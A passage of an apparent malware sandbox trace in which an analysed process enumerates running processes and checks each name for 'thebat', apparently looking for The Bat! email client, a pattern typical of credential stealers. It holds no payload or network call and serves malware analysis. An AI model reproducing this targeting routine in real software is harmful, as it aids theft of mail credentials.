lpString2="sihost.exe" | out: lpString1="sihost.exe") returned="sihost.exe" [0099.476] StrStrIA (lpFirst="sihost.exe", lpSrch="thebat") returned 0x0 [0099.476] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x720, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0099.477] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.477] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x357c180 [0099.477] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x357c180, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0099.477] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0099.477] StrStrIA (lpFirst="svchost.exe", lpSrch="thebat") returned 0x0 [0099.477] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0099.479] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0099.479] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x357c240 [0099.479] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x357c240, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 14 [0099.479] lstrcpyA (in: lpString1=0x567fabc, lpString2="taskhostw.exe" | out: lpString1="taskhostw.exe") returned="taskhostw.exe" [0099.479] StrStrIA (lpFirst="taskhostw.exe", lpSrch="thebat") returned 0x0 [0099.479] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x560, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3e, th32ParentProcessID=0x568, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0099.480] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="explorer.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0099.480] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x357bfe8 [0099.480] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="explorer.exe", cchWideChar=-1, lpMultiByteStr=0x357bfe8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 13 [0099.480] lstrcpyA (in: lpString1=0x567fabc, lpString2="explorer.exe" | out: lpString1="explorer.exe") returned="explorer.exe" [0099.480] StrStrIA (lpFirst="explorer.exe", lpSrch="thebat") returned 0x0 [0099.480] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x818, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0099.481] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0099.481] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x357a638 [0099.481] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=-1, lpMultiByteStr=0x357a638, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 21 [0099.481] lstrcpyA (in: lpString1=0x567fabc, lpString2="OfficeClickToRun.exe" | out: lpString1="OfficeClickToRun.exe") returned="OfficeClickToRun.exe" [0099.481] StrStrIA (lpFirst="OfficeClickToRun.exe", lpSrch="thebat") returned 0x0 [0099.481] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x84c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0099.483] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SecurityHealthService.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0099.483] LocalAlloc (uFlags=0x40, uBytes=0x1a) returned 0x356b898 [0099.483] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SecurityHealthService.exe", cchWideChar=-1, lpMultiByteStr=0x356b898, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SecurityHealthService.exe", lpUsedDefaultChar=0x0) returned 26 [0099.483] lstrcpyA (in: lpString1=0x567fabc, lpString2="SecurityHealthService.exe" | out: lpString1="SecurityHealthService.exe") returned="SecurityHealthService.exe" [0099.483] StrStrIA (lpFirst="SecurityHealthService.exe", lpSrch="thebat") returned 0x0 [0099.483] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0099.484] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="Memory Compression", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0099.484] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x357a698 [0099.484] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="Memory Compression", cchWideChar=-1, lpMultiByteStr=0x357a698, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Memory Compression", lpUsedDefaultChar=0x0) returned 19 [0099.484] lstrcpyA (in: lpString1=0x567fabc, lpString2="Memory Compression" | out: lpString1="Memory Compression") returned="Memory Compression" [0099.484] StrStrIA (lpFirst="Memory Compression", lpSrch="thebat") returned 0x0 [0099.484] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb3c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0099.485] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0099.485] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x357a6d8 [0099.485] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=-1, lpMultiByteStr=0x357a6d8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 24 [0099.485] lstrcpyA (in: lpString1=0x567fabc, lpString2="ShellExperienceHost.exe" | out: lpString1="ShellExperienceHost.exe") returned="ShellExperienceHost.exe" [0099.485] StrStrIA (lpFirst="ShellExperienceHost.exe", lpSrch="thebat") returned 0x0 [0099.485] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0099.487] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SearchUI.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0099.487] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x357c1c8 [0099.487] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SearchUI.exe", cchWideChar=-1, lpMultiByteStr=0x357c1c8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 13 [0099.487] lstrcpyA (in: lpString1=0x567fabc, lpString2="SearchUI.exe" | out: lpString1="SearchUI.exe") returned="SearchUI.exe" [0099.487] StrStrIA (lpFirst="SearchUI.exe", lpSrch="thebat") returned 0x0 [0099.587] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0099.588] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="RuntimeBroker.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0099.588] LocalAlloc (uFlags=0x40, uBytes=0x12) returned 0x357a6f8 [0099.588] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="RuntimeBroker.exe", cchWideChar=-1, lpMultiByteStr=0x357a6f8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 18 [0099.588] lstrcpyA (in: lpString1=0x567fabc, lpString2="RuntimeBroker.exe" | out: lpString1="RuntimeBroker.exe") returned="RuntimeBroker.exe" [0099.588] StrStrIA (lpFirst="RuntimeBroker.exe", lpSrch="thebat") returned 0x0 [0099.588] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0099.589] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0099.589] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x357c138 [0099.589] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x357c138, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 13 [0099.589] lstrcpyA (in: lpString1=0x567fabc, lpString2="WmiPrvSE.exe" | out: lpString1="WmiPrvSE.exe") returned="WmiPrvSE.exe" [0099.589] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="thebat") returned 0x0 [0099.590] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="pending.exe")) returned 1 [0099.591] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pending.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.591] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x357c030 [0099.591] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pending.exe", cchWideChar=-1, lpMultiByteStr=0x357c030, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pending.exe", lpUsedDefaultChar=0x0) returned 12 [0099.591] lstrcpyA (in: lpString1=0x567fabc, lpString2="pending.exe" | out: lpString1="pending.exe") returned="pending.exe" [0099.591] StrStrIA (lpFirst="pending.exe", lpSrch="thebat") returned 0x0 [0099.591] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="appointmentimpressed.exe")) returned 1 [0099.592] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="appointmentimpressed.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0099.592] LocalAlloc (uFlags=0x40, uBytes=0x19) returned 0x356bb90 [0099.592] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="appointmentimpressed.exe", cchWideChar=-1, lpMultiByteStr=0x356bb90, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="appointmentimpressed.exe", lpUsedDefaultChar=0x0) returned 25 [0099.592] lstrcpyA (in: lpString1=0x567fabc, lpString2="appointmentimpressed.exe" | out: lpString1="appointmentimpressed.exe") returned="appointmentimpressed.exe" [0099.592] StrStrIA (lpFirst="appointmentimpressed.exe", lpSrch="thebat") returned 0x0 [0099.592] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="swing prefer.exe")) returned 1 [0099.594] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="swing prefer.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0099.594] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x357a718 [0099.594] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="swing prefer.exe", cchWideChar=-1, lpMultiByteStr=0x357a718, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="swing prefer.exe", lpUsedDefaultChar=0x0) returned 17 [0099.594] lstrcpyA (in: lpString1=0x567fabc, lpString2="swing prefer.exe" | out: lpString1="swing prefer.exe") returned="swing prefer.exe" [0099.594] StrStrIA (lpFirst="swing prefer.exe", lpSrch="thebat") returned 0x0 [0099.594] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x384, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="vietnamese_mature_hat.exe")) returned 1 [0099.595] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="vietnamese_mature_hat.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0099.595] LocalAlloc (uFlags=0x40, uBytes=0x1a) returned 0x356bca8 [0099.595] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="vietnamese_mature_hat.exe", cchWideChar=-1, lpMultiByteStr=0x356bca8, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="vietnamese_mature_hat.exe", lpUsedDefaultChar=0x0) returned 26 [0099.595] lstrcpyA (in: lpString1=0x567fabc, lpString2="vietnamese_mature_hat.exe" | out: lpString1="vietnamese_mature_hat.exe") returned="vietnamese_mature_hat.exe" [0099.595] StrStrIA (lpFirst="vietnamese_mature_hat.exe", lpSrch="thebat") returned 0x0 [0099.595] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="nights-attending.exe")) returned 1 [0099.600] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="nights-attending.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0099.600] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x357a778 [0099.601] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="nights-attending.exe", cchWideChar=-1, lpMultiByteStr=0x357a778, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="nights-attending.exe", lpUsedDefaultChar=0x0) returned 21 [0099.601] lstrcpyA (in: lpString1=0x567fabc, lpString2="nights-attending.exe" | out: lpString1="nights-attending.exe") returned="nights-attending.exe" [0099.601] StrStrIA (lpFirst="nights-attending.exe", lpSrch="thebat") returned 0x0 [0099.601] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x51c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="installed.exe")) returned 1 [0099.602] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="installed.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0099.602] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x357c210 [0099.602] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="installed.exe", cchWideChar=-1, lpMultiByteStr=0x357c210, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="installed.exe", lpUsedDefaultChar=0x0) returned 14 [0099.602] lstrcpyA (in: lpString1=0x567fabc, lpString2="installed.exe" | out: lpString1="installed.exe") returned="installed.exe" [0099.602] StrStrIA (lpFirst="installed.exe", lpSrch="thebat") returned 0x0 [0099.602] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x794, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="references compounds.exe")) returned 1 [0099.603] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="references compounds.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0099.603] LocalAlloc (uFlags=0x40, uBytes=0x19) returned 0x356bbb8 [0099.603] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="references compounds.exe", cchWideChar=-1, lpMultiByteStr=0x356bbb8, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="references compounds.exe", lpUsedDefaultChar=0x0) returned 25 [0099.603] lstrcpyA (in: lpString1=0x567fabc, lpString2="references compounds.exe" | out: lpString1="references compounds.exe") returned="references compounds.exe" [0099.603] StrStrIA (lpFirst="references compounds.exe", lpSrch="thebat") returned 0x0 [0099.603] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="albuquerque_left.exe")) returned 1 [0099.605] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="albuquerque_left.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0099.605] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x357db28 [0099.605] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="albuquerque_left.exe", cchWideChar=-1, lpMultiByteStr=0x357db28, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="albuquerque_left.exe", lpUsedDefaultChar=0x0) returned 21 [0099.605] lstrcpyA (in: lpString1=0x567fabc, lpString2="albuquerque_left.exe" | out: lpString1="albuquerque_left.exe") returned="albuquerque_left.exe" [0099.605] StrStrIA (lpFirst="albuquerque_left.exe", lpSrch="thebat") returned 0x0 [0099.605] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="registered try.exe")) returned 1 [0099.606] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="registered try.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0099.606] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x357d948 [0099.606] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="registered try.exe", cchWideChar=-1, lpMultiByteStr=0x357d948, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="registered try.exe", lpUsedDefaultChar=0x0) returned 19 [0099.606] lstrcpyA (in: lpString1=0x567fabc, lpString2="registered try.exe" | out: lpString1="registered try.exe") returned="registered try.exe" [0099.606] StrStrIA (lpFirst="registered try.exe", lpSrch="thebat") returned 0x0 [0099.606] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="consultancy statute ide.exe")) returned 1 [0099.607] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="consultancy statute ide.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0099.607] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x356b938 [0099.607] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="consultancy statute ide.exe", cchWideChar=-1, lpMultiByteStr=0x356b938, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="consultancy statute ide.exe", lpUsedDefaultChar=0x0) returned 28 [0099.608] lstrcpyA (in: lpString1=0x567fabc, lpString2="consultancy statute ide.exe" | out: lpString1="consultancy statute ide.exe") returned="consultancy statute ide.exe" [0099.608] StrStrIA (lpFirst="consultancy statute ide.exe", lpSrch="thebat") returned 0x0 [0099.608] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x67c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="invite.exe")) returned 1 [0099.609] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="invite.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0099.609] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x357c1f8 [0099.609] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="invite.exe", cchWideChar=-1, lpMultiByteStr=0x357c1f8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="invite.exe", lpUsedDefaultChar=0x0) returned 11 [0099.609] lstrcpyA (in: lpString1=0x567fabc, lpString2="invite.exe" | out: lpString1="invite.exe") returned="invite.exe" [0099.609] StrStrIA (lpFirst="invite.exe", lpSrch="thebat") returned 0x0 [0099.609] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="idol.exe")) returned 1 [0099.610] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="idol.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0099.610] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x357c288 [0099.610] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="idol.exe", cchWideChar=-1, lpMultiByteStr=0x357c288, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="idol.exe", lpUsedDefaultChar=0x0) returned 9 [0099.610] lstrcpyA (in: lpString1=0x567fabc, lpString2="idol.exe" | out: lpString1="idol.exe") returned="idol.exe" [0099.610] StrStrIA (lpFirst="idol.exe", lpSrch="thebat") returned 0x0 [0099.610] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="latitude qualifications.exe")) returned 1 [0099.611] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="latitude qualifications.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0099.611] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x356ba28 [0099.611] WideCharToMultiByte (in: 